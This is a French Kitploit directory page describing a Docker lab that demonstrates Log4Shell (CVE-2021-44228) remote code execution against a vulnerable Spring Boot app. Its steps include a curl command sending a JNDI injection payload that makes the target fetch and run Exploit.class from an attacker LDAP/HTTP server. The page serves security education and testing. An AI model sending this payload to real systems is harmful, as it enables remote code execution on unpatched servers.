Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-44228_Log4Shell — Démonstration d'exploitation RCE basée sur Docker pour Log4Shell (CVE-2021-44228) avec une application Spring Boot vulnérable, un serveur LDAP malveillant et une livraison de charge utile via injection JNDI. | Kitploit
Outils/GitHubGitHub/vutiendat323/cve-2021-44228_log4shell
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebApprentissage et ÉducationLabs et Pratique
GitHubvutiendat323/cve-2021-44228_log4shell

CVE-2021-44228_Log4Shell

Démonstration d'exploitation RCE basée sur Docker pour Log4Shell (CVE-2021-44228) avec une application Spring Boot vulnérable, un serveur LDAP malveillant et une livraison de charge utile via injection JNDI.

Voir le dépôt
2il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Démonstration de l'exploitation de la vulnérabilité Log4Shell (CVE-2021-44228)

Ce projet simule un scénario d'attaque RCE via la vulnérabilité Log4Shell dans la bibliothèque Apache Log4j 2.

Composants

  1. vulnerable-app: Application Spring Boot utilisant Log4j 2.14.1.
  2. attacker: Contient un serveur LDAP malveillant (marshalsec) et un serveur HTTP servant le fichier malveillant Exploit.class.

Procédure

1. Démarrer l'environnement

Prérequis : Docker et Docker Compose installés.

root@kitploit:~
docker compose up --build

Attendez que les deux conteneurs soient prêts. vulnerable-app s'exécutera sur le port 8080.

2. Effectuer l'attaque

Ouvrez un nouveau terminal et envoyez une requête contenant la charge utile JNDI via l'en-tête X-Api-Version :

root@kitploit:~
curl -H 'X-Api-Version: ${jndi:ldap://attacker:1389/Exploit}' http://localhost:8080/

3. Vérifier les résultats

  • Vérifiez les logs du conteneur vulnerable-app. Vous verrez le message que la charge utile a été enregistrée.
  • Vérifiez les logs du conteneur attacker. Vous verrez la connexion LDAP redirigée vers le serveur HTTP.
  • Vérification RCE : Vérifiez si le fichier /tmp/pwned a été créé à l'intérieur du conteneur vulnerable-app :
root@kitploit:~
docker exec -it vulnerable-app ls -la /tmp/pwned

Si le fichier existe, cela prouve que le code malveillant Exploit.class a été exécuté avec succès !

Avertissement

Ce projet est exclusivement destiné à des fins éducatives et de recherche en sécurité. Ne l'utilisez en aucun cas à des fins illégales.

Télécharger l’outil